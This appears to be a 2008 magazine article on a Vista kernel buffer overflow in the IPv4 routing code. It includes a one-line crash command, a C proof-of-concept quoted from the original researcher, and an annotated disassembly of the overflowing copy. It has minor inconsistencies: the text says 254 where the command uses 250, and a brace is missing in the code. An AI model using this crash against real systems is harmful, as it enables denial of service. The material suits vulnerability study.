Cyberwarfare Magazine

CNet reported not long ago about a new vulnerability found in the kernel of Vista[1]. The attack is a buffer overflow which corrupts the memory, and thus could be use for denial of service attacks. The report from Phion, the security company that reported the vulnerability, also states that the attack could be used to inject code[2].

There is a new vulnerability found in the kernel of Vista. The attack is a buffer overflow which corrupts the memory

The buffer overflow is caused by adding an IP address with an illegal subnet bits value to the IPv4 routing table: For example the following command will make Vista crash with a blue screen of death:

C:>route add 127.0.0.1/250 127.0.0.2

In the command above, we specified 254 as being the number of subnet bits, which is an illegal value. According to the vulnerability report by Thomas Unterleitner, the greater the value is, the quicker the crash is provoked[3].

The overflow is located into the CreateIpForwardEntry2 method which is part of the Iphlpapi library (Iphlpapi.dll). The problem arises because the method doesn’t verify the value of the PrefixLength property of DestinationPrefix specified in the MIB_IPFORWARD_ROW2 structure passed to the method. Therefore, the following code should crash the kernel[4]:

   1:  #define _WIN32_WINNT 0x0600
   2:  #define WIN32_LEAN_AND_MEAN
   3:  
   4:  #include <windows.h>
   5:  #include <winsock2.h>
   6:  #include <ws2ipdef.h>
   7:  #include <iphlpapi.h>
   8:  
   9:  #include <stdio.h>
  10:  #include <stdlib.h>
  11:  
  12:  int main(int argc, char** argv)
  13:  
  14:      DWORD               dwStatus;
  15:      MIB_IPFORWARD_ROW2 route;
  16:  
  17:      if (argc != 3)
  18:      {
  19:          printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
  20:          return -1;
  21:      }
  22:  
  23:      InitializeIpForwardEntry(&route);
  24:  
  25:      route.InterfaceIndex = atoi(argv[1]);
  26:      route.DestinationPrefix.Prefix.si_family = AF_INET;
  27:  
  28:      route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr
  29:  = inet_addr("1.2.3.0");
  30:      route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;
  31:  
  32:      route.DestinationPrefix.PrefixLength = atoi(argv[2]);
  33:  
  34:      route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
  35:      route.NextHop.Ipv4.sin_family        = AF_INET;
  36:  
  37:      route.SitePrefixLength        = 0;
  38:  
  39:      route.Protocol            = MIB_IPPROTO_NETMGMT;
  40:      route.Origin                = NlroManual;
  41:      route.ValidLifetime        = 0xffffffff;
  42:      route.PreferredLifetime        = 0xffffffff;
  43:      route.Metric                = 1;
  44:  
  45:      dwStatus = CreateIpForwardEntry2(&route);
  46:      return dwStatus;

In order for this code to work you must be in the Administrators group or in the Network Operators Group…so it’s of limited use for most people, but you never know…

NETIO!PtpCopyPartialKeys:
mov     edi,edi
push    ebp
mov     ebp,esp
movzx   eax,word ptr [ebp+10h]   ; = 0x00ee  PrefixLength in bits
add     eax,7
shr     eax,3
push    eax                      ; 0x0000001e PrefixLength in bytes
push    dword ptr [ebp+0Ch]      ; 0x934b7ac4 src buffer
push    dword ptr [ebp+8]        ; 0x83716398 dst buffer
; 83716398  00 00 00 00 00 00 00 00-05 00 06 04 45 76 65 ee
; 837163a8  01 00 00 00 01 00 00 00-78 81 15 83 00 00 00 00
; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; ------------------------------------------------------------------
call    NETIO!memcpy
; memcpy(0x83716398, 0x934b7ac4, 0x0000001e) // BUFFER OVERFLOW!!!!
; ------------------------------------------------------------------
; 83716398  01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93
; 837163a8  78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 00 00
; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; compare the byte values with the src buffer printed before

add     esp,0Ch
pop     ebp
ret     0Ch
neg     ecx
push    ecx

Microsoft said it had no intention of patching this buffer overflow before the next Vista service pack[5]. This exploit doesn’t apply to Windows XP.

[2] “Microsoft VISTA TCP/IP stack buffer overflow”, Thomas Unterleitner, November 19, 2008, http://www.securityfocus.com/archive/1/498471 (accessed on November 25, 2008)

[3] Ibid.

[4] Ibid. Code by Thomas Unterleitner

[5] “Vista kernel is vulnerable”, Egan Orion, The Inquirer, November 24, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/11/24/vista-kernel-vulnerable (accessed on November 25, 2008)